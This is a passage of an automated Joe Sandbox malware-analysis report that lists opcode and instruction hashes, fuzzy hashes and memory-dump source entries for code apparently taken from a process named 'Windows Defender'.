                                      • Opcode ID: 45a705bfca50567f68736f605a5d8e079ce1c708c557b0da582901b18cfb555a
                                      • Instruction ID: b85b048404b3c13945eb2b000f5d02cd9b62806759b539dce7400ec209086769
                                      • Opcode Fuzzy Hash: 45a705bfca50567f68736f605a5d8e079ce1c708c557b0da582901b18cfb555a
                                      • Instruction Fuzzy Hash: 8A21B572F1490E4BEB94EB98C8A51FD7BF1FF95314F400136D10EF2291DD6868028780
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a0397f729d0e7e41455b85720d479789cccd7c7eee38dd7e170acbc990801ff5
                                      • Instruction ID: 24d782f5cfbef73a1acd4f333003a3345614296c0fc24bb6615e5e2cdc2e985f
                                      • Opcode Fuzzy Hash: a0397f729d0e7e41455b85720d479789cccd7c7eee38dd7e170acbc990801ff5
                                      • Instruction Fuzzy Hash: 4221A411B18D1A4BFB90BBEC946A3BEA2D2EF98712F24017AE00DD32C2DD6868014791
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dddd2926a72b204c20683e76f9866006c5ce9119fbb55698f0b33cd52f0f6075
                                      • Instruction ID: 0ed5b2b296a952629128e4b561cd896bb241c245ab4921029992b9cbbc99f1f5
                                      • Opcode Fuzzy Hash: dddd2926a72b204c20683e76f9866006c5ce9119fbb55698f0b33cd52f0f6075
                                      • Instruction Fuzzy Hash: 0621B230B547494FD751EBE8C0A46AB7FA1FF9E204B8044A8D44DC338ADD3469488B44
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c715e5f67f1946aa4e29f86c3d2760ba6d17182b4b51f16e2b367676d5c37086
                                      • Instruction ID: 41fa48c181141ba7b4b48f0a2b31ee98e482580b4d98fb3e0abdcc260bc77add
                                      • Opcode Fuzzy Hash: c715e5f67f1946aa4e29f86c3d2760ba6d17182b4b51f16e2b367676d5c37086
                                      • Instruction Fuzzy Hash: B0017B15A0CBD10FE786AA3818A11B23FE0DFD7211B080CBBD889C60D7DC8C69449382